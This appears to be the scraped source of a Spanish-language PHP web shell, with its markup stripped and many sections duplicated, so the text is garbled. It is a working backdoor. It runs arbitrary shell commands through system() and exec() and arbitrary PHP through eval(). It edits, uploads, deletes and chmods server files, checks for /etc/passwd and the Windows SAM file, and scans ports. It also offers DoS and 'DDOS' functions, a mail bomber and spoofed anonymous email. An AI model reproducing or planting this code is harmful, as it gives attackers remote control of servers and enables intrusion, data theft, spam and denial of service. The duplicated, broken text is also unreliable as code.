1
'.$nombre_s.' '.$version.'
'; $gardara=$_POST['gardara']; $filepath=realpath($_POST['filepath']); if ($gardara <> "") { $fp=fopen("$filepath","w+"); fwrite ($fp,"") ; fwrite ($fp,$gardara) ; fclose($fp); echo " "; } return 0; } function tamaño($size){ if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";} elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";} elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";} else {$size = $size . " B";} return $size;} function permisos($file) { $perms = fileperms($file); if (($perms & 0xC000) == 0xC000) {$info = 's';} elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} elseif (($perms & 0x8000) == 0x8000) {$info = '-';} elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} else {$info = 'u';} $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ?(($perms & 0x0800) ? 's' : 'x' ) :(($perms & 0x0800) ? 'S' : '-')); $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ?(($perms & 0x0400) ? 's' : 'x' ) :(($perms & 0x0400) ? 'S' : '-')); $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ?(($perms & 0x0200) ? 't' : 'x' ) :(($perms & 0x0200) ? 'T' : '-')); return $info; } $fchmod=$_GET['fchmod']; if ($fchmod <> "" ){ $fchmod=realpath($fchmod); echo "
File: $fchmod
'; ?>
<? $chmod0=$_POST['chmod0']; if ($_POST['chmod0']) { if ($chmod0 <> ""){ chmod ($fchmod , $chmod0); }else { echo "No se permite cambiar Chmod"; }} echo '
'.$nombre_s.' '.$version.'
'; exit(); } if ($opcion == 'info_sistema') { echo '
System info
PHP info
Sistema operativo: '.php_uname().'
Server: '.$_SERVER['SERVER_SOFTWARE'].'
Versionn PHP: '.PHP_VERSION.'
Espacio: '.tamaño(diskfreespace(getcwd())).'/'.tamaño(disk_total_space(getcwd())).'
Host: '.$_SERVER['HTTP_HOST'].'
IP: '.$_SERVER['SERVER_ADDR'].'
Admin mail: '.$_SERVER['SERVER_ADMIN'].'
Safe Mode: '.$safe.'
cURL: '.(($curl_on)?('On'):('Off')).'
Perl: '.$perle.'.
Magic quotes: '.$magic.'.
WGET: '.$wgete.'.
Bases de datos activas: '.$base.'
'; if (file_exists("C:/WINDOWS/repair/sam")) { echo ' Found: SAM'; } if (file_exists("/etc/passwd")) { echo ' Found: <style="color: white;">etc/passwd
'; } echo '
'; } elseif ($opcion == 'dos') { echo '
PHP info
Sistema operativo: '.php_uname().'
Server: '.$_SERVER['SERVER_SOFTWARE'].'
Versionn PHP: '.PHP_VERSION.'
Espacio: '.tamaño(diskfreespace(getcwd())).'/'.tamaño(disk_total_space(getcwd())).'
Host: '.$_SERVER['HTTP_HOST'].'
IP: '.$_SERVER['SERVER_ADDR'].'
Admin mail: '.$_SERVER['SERVER_ADMIN'].'
Safe Mode: '.$safe.'
cURL: '.(($curl_on)?('On'):('Off')).'
Perl: '.$perle.'.
Magic quotes: '.$magic.'.
WGET: '.$wgete.'.
Bases de datos activas: '.$base.'
'; if (file_exists("C:/WINDOWS/repair/sam")) { echo ' Found: SAM'; } if (file_exists("/etc/passwd")) { echo ' Found: <style="color: white;">etc/passwd
'; } elseif ($opcion == 'dos') { echo '
DOS
DDOS | DOS Local'; } elseif ($opcion == 'escaner_puertos') { echo '
DDOS | DOS Local'; } elseif ($opcion == 'escaner_puertos') { echo '
Port scan
'; if ($target != '') { echo 'Target: '.$target.'
'; echo 'Rango: '.$inicio.'-'.$final.'
'; } $final++; for ( $i = $inicio ; $i < $final ; $i++ ) { $abierto = @fsockopen($target,$i,$errno,$errstr,1); if ($abierto) { echo "Port open: ".$i."
"; } else { if ($target != '') { echo "Port close: ".$i."
"; }}} echo '
'; } elseif ($opcion == 'mail') { echo '
'; if ($target != '') { echo 'Target: '.$target.'
'; echo 'Rango: '.$inicio.'-'.$final.'
'; } $final++; for ( $i = $inicio ; $i < $final ; $i++ ) { $abierto = @fsockopen($target,$i,$errno,$errstr,1); if ($abierto) { echo "Port open: ".$i."
"; } else { if ($target != '') { echo "Port close: ".$i."
"; }}} echo '
'; } elseif ($opcion == 'mail') { echo '
Mail
Mail bomber | Mail anonymous'; } elseif ($opcion == 'ddos') { echo '
Mail bomber | Mail anonymous'; } elseif ($opcion == 'ddos') { echo '
DDOS
'; if($_POST['ddosf'] && $_POST['timeddos']){ for ($id=0;$$id<$_POST['timeddos'];$id++){ $fp=null; $contents=null; $fp=fopen($_POST['ddosf'],"rb"); while (!feof($fp)) { $contents .= fread($fp, 8192); } fclose($fp); }} } elseif ($opcion == 'derribar') { echo '
'; if($_POST['ddosf'] && $_POST['timeddos']){ for ($id=0;$$id<$_POST['timeddos'];$id++){ $fp=null; $contents=null; $fp=fopen($_POST['ddosf'],"rb"); while (!feof($fp)) { $contents .= fread($fp, 8192); } fclose($fp); }} } elseif ($opcion == 'derribar') { echo '
Dos local
Si pulsas el botón de abajo es probable que el servidor acabe caido, ¿estás seguro?
¡¡Tirar!! '; } elseif ($opcion == 'encode_decode') { echo '
Si pulsas el botón de abajo es probable que el servidor acabe caido, ¿estás seguro?
¡¡Tirar!! '; } elseif ($opcion == 'encode_decode') { echo '
Encode/decode
'; $tipoe = 'Cadena'; $cadena = $_POST[cadena]; $tipoende = $_POST[tipoende]; if ($tipoende=='MD5 - encode') { $resultado = md5($cadena); } elseif ($tipoende=='MD4 - encode') { $resultado = hash('md4', $cadena); } elseif ($tipoende=='SHA1 - encode') { $resultado = sha1($cadena); } elseif ($tipoende=='SHA256 - encode') { $resultado = hash('sha256', $cadena); } elseif ($tipoende=='SHA384 - encode') { $resultado = hash('sha384', $cadena); } elseif ($tipoende=='SHA512 - encode') { $resultado = hash('sha512', $cadena); } elseif ($tipoende=='ripemd128 - encode') { $resultado = hash('ripemd128', $cadena); } elseif ($tipoende=='ripemd160 - encode') { $resultado = hash('ripemd160', $cadena); } elseif ($tipoende=='ripemd256 - encode') { $resultado = hash('ripemd256', $cadena); } elseif ($tipoende=='ripemd320 - encode') { $resultado = hash('ripemd320', $cadena); } elseif ($tipoende=='whirlpool - encode') { $resultado = hash('whirlpool', $cadena); } elseif ($tipoende=='tiger128,3 - encode') { $resultado = hash('tiger128,3', $cadena); } elseif ($tipoende=='tiger160,3 - encode') { $resultado = hash('tiger160,3', $cadena); } elseif ($tipoende=='tiger192,3 - encode') { $resultado = hash('tiger192,3', $cadena); } elseif ($tipoende=='tiger128,4 - encode') { $resultado = hash('tiger128,4', $cadena); } elseif ($tipoende=='tiger160,4 - encode') { $resultado = hash('tiger160,4', $cadena); } elseif ($tipoende=='tiger192,4 - encode') { $resultado = hash('tiger192,4', $cadena); } elseif ($tipoende=='snefru - encode') { $resultado = hash('snefru', $cadena); } elseif ($tipoende=='gost - encode') { $resultado = hash('gost', $cadena); } elseif ($tipoende=='adler32 - encode') { $resultado = hash('adler32', $cadena); } elseif ($tipoende=='crc32 - encode') { $resultado = hash('crc32', $cadena); } elseif ($tipoende=='crc32b - encode') { $resultado = hash('crc32b', $cadena); } elseif ($tipoende=='haval128,3 - encode') { $resultado = hash('haval128,3', $cadena); } elseif ($tipoende=='haval160,3 - encode') { $resultado = hash('haval160,3', $cadena); } elseif ($tipoende=='haval192,3 - encode') { $resultado = hash('haval192,3', $cadena); } elseif ($tipoende=='haval224,3 - encode') { $resultado = hash('haval224,3', $cadena); } elseif ($tipoende=='haval256,3 - encode') { $resultado = hash('haval256,3', $cadena); } elseif ($tipoende=='haval128,4 - encode') { $resultado = hash('haval128,4', $cadena); } elseif ($tipoende=='haval160,4 - encode') { $resultado = hash('haval160,4', $cadena); } elseif ($tipoende=='haval192,4 - encode') { $resultado = hash('haval192,4', $cadena); } elseif ($tipoende=='haval224,4 - encode') { $resultado = hash('haval224,4', $cadena); } elseif ($tipoende=='haval256,4 - encode') { $resultado = hash('haval256,4', $cadena); } elseif ($tipoende=='haval128,5 - encode') { $resultado = hash('haval128,5', $cadena); } elseif ($tipoende=='haval160,5 - encode') { $resultado = hash('haval160,5', $cadena); } elseif ($tipoende=='haval192,5 - encode') { $resultado = hash('haval192,5', $cadena); } elseif ($tipoende=='haval224,5 - encode') { $resultado = hash('haval224,5', $cadena); } elseif ($tipoende=='haval256,5 - encode') { $resultado = hash('haval256,5', $cadena); } elseif ($tipoende=='Base64 - encode') { $resultado = base64_encode($cadena); } elseif ($tipoende=='Base64 - decode') { $resultado = base64_decode($cadena); } elseif ($tipoende=='URL - encode') { $resultado = rawurlencode($cadena); } elseif ($tipoende=='URL - decode') { $resultado = rawurldecode($cadena); } if ($tipoende != ''){ $tipoe = $tipoende; } echo '
'; } elseif ($opcion == 'mail_bomber') { echo '
'; $tipoe = 'Cadena'; $cadena = $_POST[cadena]; $tipoende = $_POST[tipoende]; if ($tipoende=='MD5 - encode') { $resultado = md5($cadena); } elseif ($tipoende=='MD4 - encode') { $resultado = hash('md4', $cadena); } elseif ($tipoende=='SHA1 - encode') { $resultado = sha1($cadena); } elseif ($tipoende=='SHA256 - encode') { $resultado = hash('sha256', $cadena); } elseif ($tipoende=='SHA384 - encode') { $resultado = hash('sha384', $cadena); } elseif ($tipoende=='SHA512 - encode') { $resultado = hash('sha512', $cadena); } elseif ($tipoende=='ripemd128 - encode') { $resultado = hash('ripemd128', $cadena); } elseif ($tipoende=='ripemd160 - encode') { $resultado = hash('ripemd160', $cadena); } elseif ($tipoende=='ripemd256 - encode') { $resultado = hash('ripemd256', $cadena); } elseif ($tipoende=='ripemd320 - encode') { $resultado = hash('ripemd320', $cadena); } elseif ($tipoende=='whirlpool - encode') { $resultado = hash('whirlpool', $cadena); } elseif ($tipoende=='tiger128,3 - encode') { $resultado = hash('tiger128,3', $cadena); } elseif ($tipoende=='tiger160,3 - encode') { $resultado = hash('tiger160,3', $cadena); } elseif ($tipoende=='tiger192,3 - encode') { $resultado = hash('tiger192,3', $cadena); } elseif ($tipoende=='tiger128,4 - encode') { $resultado = hash('tiger128,4', $cadena); } elseif ($tipoende=='tiger160,4 - encode') { $resultado = hash('tiger160,4', $cadena); } elseif ($tipoende=='tiger192,4 - encode') { $resultado = hash('tiger192,4', $cadena); } elseif ($tipoende=='snefru - encode') { $resultado = hash('snefru', $cadena); } elseif ($tipoende=='gost - encode') { $resultado = hash('gost', $cadena); } elseif ($tipoende=='adler32 - encode') { $resultado = hash('adler32', $cadena); } elseif ($tipoende=='crc32 - encode') { $resultado = hash('crc32', $cadena); } elseif ($tipoende=='crc32b - encode') { $resultado = hash('crc32b', $cadena); } elseif ($tipoende=='haval128,3 - encode') { $resultado = hash('haval128,3', $cadena); } elseif ($tipoende=='haval160,3 - encode') { $resultado = hash('haval160,3', $cadena); } elseif ($tipoende=='haval192,3 - encode') { $resultado = hash('haval192,3', $cadena); } elseif ($tipoende=='haval224,3 - encode') { $resultado = hash('haval224,3', $cadena); } elseif ($tipoende=='haval256,3 - encode') { $resultado = hash('haval256,3', $cadena); } elseif ($tipoende=='haval128,4 - encode') { $resultado = hash('haval128,4', $cadena); } elseif ($tipoende=='haval160,4 - encode') { $resultado = hash('haval160,4', $cadena); } elseif ($tipoende=='haval192,4 - encode') { $resultado = hash('haval192,4', $cadena); } elseif ($tipoende=='haval224,4 - encode') { $resultado = hash('haval224,4', $cadena); } elseif ($tipoende=='haval256,4 - encode') { $resultado = hash('haval256,4', $cadena); } elseif ($tipoende=='haval128,5 - encode') { $resultado = hash('haval128,5', $cadena); } elseif ($tipoende=='haval160,5 - encode') { $resultado = hash('haval160,5', $cadena); } elseif ($tipoende=='haval192,5 - encode') { $resultado = hash('haval192,5', $cadena); } elseif ($tipoende=='haval224,5 - encode') { $resultado = hash('haval224,5', $cadena); } elseif ($tipoende=='haval256,5 - encode') { $resultado = hash('haval256,5', $cadena); } elseif ($tipoende=='Base64 - encode') { $resultado = base64_encode($cadena); } elseif ($tipoende=='Base64 - decode') { $resultado = base64_decode($cadena); } elseif ($tipoende=='URL - encode') { $resultado = rawurlencode($cadena); } elseif ($tipoende=='URL - decode') { $resultado = rawurldecode($cadena); } if ($tipoende != ''){ $tipoe = $tipoende; } echo '
Mail Bomber
'; if (isset($_POST['Send'])) { $need .="MIME-Version: 1.0\n"; $need .="Content-type: text/html ; charset=iso-8859-1\n"; $need .="MIME-Version: 1.0\n"; $need .="From: ".$_POST['nombreremitente']." <".$_POST['remitente'].">\n"; $need .="To: ".$_POST['nombreremitente']."<".$_POST['remitente'].">\n"; $need .="Reply-To:".$_POST['remitente']."\n"; $need .="X-Priority: 1\n"; $need .="X-MSMail-Priority:Hight\n"; $need .="X-Mailer:Widgets.com Server"; echo "
"; flush(); } else { echo "[+] Send $i a ".$word." error.
"; }}} else { if(@mail($_POST['destinatario'],$_POST['asunto'],$_POST['mensaje'],$need)) { echo "[+] Send $i a ".$_POST['destinatario']." successfully.
"; flush(); } else { echo "[+] Send $i a ".$_POST['destinatario']." error.
"; }}} echo "
"; } } elseif ($opcion == 'mail_anonimo') { $error = ''; $Nombre = ''; $emailto = ''; $emailde = ''; $asunto = ''; $mensaje = ''; if(isset($_POST['send'])) { $Nombre = $_POST['Nombre']; $emailto = $_POST['emailto']; $emailde = $_POST['emailde']; $asunto = $_POST['asunto']; $mensaje = $_POST['mensaje']; if(trim($Nombre) == '') { $error = '
" /> <? } } elseif ($opcion == 'salir') { session_destroy(); echo '
'; if (isset($_POST['Send'])) { $need .="MIME-Version: 1.0\n"; $need .="Content-type: text/html ; charset=iso-8859-1\n"; $need .="MIME-Version: 1.0\n"; $need .="From: ".$_POST['nombreremitente']." <".$_POST['remitente'].">\n"; $need .="To: ".$_POST['nombreremitente']."<".$_POST['remitente'].">\n"; $need .="Reply-To:".$_POST['remitente']."\n"; $need .="X-Priority: 1\n"; $need .="X-MSMail-Priority:Hight\n"; $need .="X-Mailer:Widgets.com Server"; echo "
Result:
"; for ($i = 1; $i <= $_POST['cantidad']; $i++) { $listamails = 'Ninguna'; if ($listamails != "Ninguna") { $open = fopen($listamails,"r"); while(!feof($open)) { $word = fgets($open,255); $word = chop($word); if(@mail($word,$_POST['asunto'],$_POST['mensaje'],$need)) { echo "[+] Send $i a ".$word." successfully."; flush(); } else { echo "[+] Send $i a ".$word." error.
"; }}} else { if(@mail($_POST['destinatario'],$_POST['asunto'],$_POST['mensaje'],$need)) { echo "[+] Send $i a ".$_POST['destinatario']." successfully.
"; flush(); } else { echo "[+] Send $i a ".$_POST['destinatario']." error.
"; }}} echo "
"; } } elseif ($opcion == 'mail_anonimo') { $error = ''; $Nombre = ''; $emailto = ''; $emailde = ''; $asunto = ''; $mensaje = ''; if(isset($_POST['send'])) { $Nombre = $_POST['Nombre']; $emailto = $_POST['emailto']; $emailde = $_POST['emailde']; $asunto = $_POST['asunto']; $mensaje = $_POST['mensaje']; if(trim($Nombre) == '') { $error = '
Write a name
'; } else if(trim($emailto) == '') { $error = '
Write a email
'; } if(trim($emailde) == '') { $error = '
Write destinatario.
'; } else if(trim($asunto) == '') { $error = '
Write a subject.
'; } else if(trim($mensaje) == '') { $error = '
Write a message.
'; } if($error == '') { $a = $emailto; mail($a, $asunto, $mensaje, "From: $emailde\r\nReply-To: $emailto\r\nReturn-Path: $emailto\r\n"); ?>
Enviado
Enviado correctamente a.
All sessions have been destroyed.
'; } elseif ($opcion == 'eval') { echo "
Eval
'; if (isset($_POST['cargar'])) { echo "
"; eval($_POST['codigo']); echo "
"; }} else { $homedir=getcwd(); $dir=realpath($_GET['dir'])."/"; echo '
'; if (isset($_POST['cargar'])) { echo "
"; eval($_POST['codigo']); echo "
"; }} else { $homedir=getcwd(); $dir=realpath($_GET['dir'])."/"; echo '
File manager
Shell: '.$shelldir.'
Home:'.$homedir.'/
Now dir:'.$dir.'
'; $dir = opendir($path); echo " Drives found: "; foreach($scan as $drives) { $drives = $drives.":\\"; if (is_dir($drives)) { echo " "."".$drives."
"; } else { $drives = ""; }} if ($drives == "") { echo 'None.'; } echo '
'; $homedir=getcwd(); $dir=realpath($_GET['dir'])."/"; ?>
"; if (is_dir($dir)){ if ($dh=opendir($dir)){ while (($file = readdir($dh)) !== false) { $fsize=round(filesize($dir . $file)/1024); echo ""; } else { echo " -"; } echo ""; } closedir($dh); } }echo '
'; if($_GET['cmd']) { echo '
'; $modo = $_GET[modo]; if ($modo=='System') { system($_GET['cmd']); } elseif ($modo=='Exec') { echo exec($_GET['cmd']); }}echo '
Shell: '.$shelldir.'
Home:'.$homedir.'/
Now dir:'.$dir.'
'; $dir = opendir($path); echo " Drives found: "; foreach($scan as $drives) { $drives = $drives.":\\"; if (is_dir($drives)) { echo " "."".$drives."
"; } else { $drives = ""; }} if ($drives == "") { echo 'None.'; } echo '
'; $homedir=getcwd(); $dir=realpath($_GET['dir'])."/"; ?>
'; echo "
|
Nombre: | Size: | Download: | Edit: | Perms: | Chmod: | Delete: |
"; if (is_dir($dir.$file)) { echo " $file"; } else { echo " $file"; } echo " | "; if (is_file($dir.$file)) { echo $fsize.' KB'; } else { if (is_dir($dir.$file)) { echo " DIR"; } } echo " | "; if (is_file($dir.$file)){ if (is_readable($dir.$file)){ echo "Descargar"; }else { echo "Can not read"; } }else { echo " -"; } echo " | "; if (is_file($dir.$file)) { if (is_readable($dir.$file)){ echo "Editar"; }else { echo "Can not read"; } }else { echo " -"; } echo " | "; echo permisos($file)." | "; if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') { echo "Not valid on windows"; } else { echo "Chmod"; } echo " | "; if (is_file($dir.$file)){ echo "Borrar |
---|
'; if($_GET['cmd']) { echo '
'; $modo = $_GET[modo]; if ($modo=='System') { system($_GET['cmd']); } elseif ($modo=='Exec') { echo exec($_GET['cmd']); }}echo '
'; if (isset($_FILES['archivo'])) { $subir = basename($_FILES['archivo']['name']); if (move_uploaded_file($_FILES['archivo']['tmp_name'],$subir)) { }}echo '
'; }echo '
'.$nombre_s.' '.$version.'
'; ?>'.$nombre_s.' '.$version.'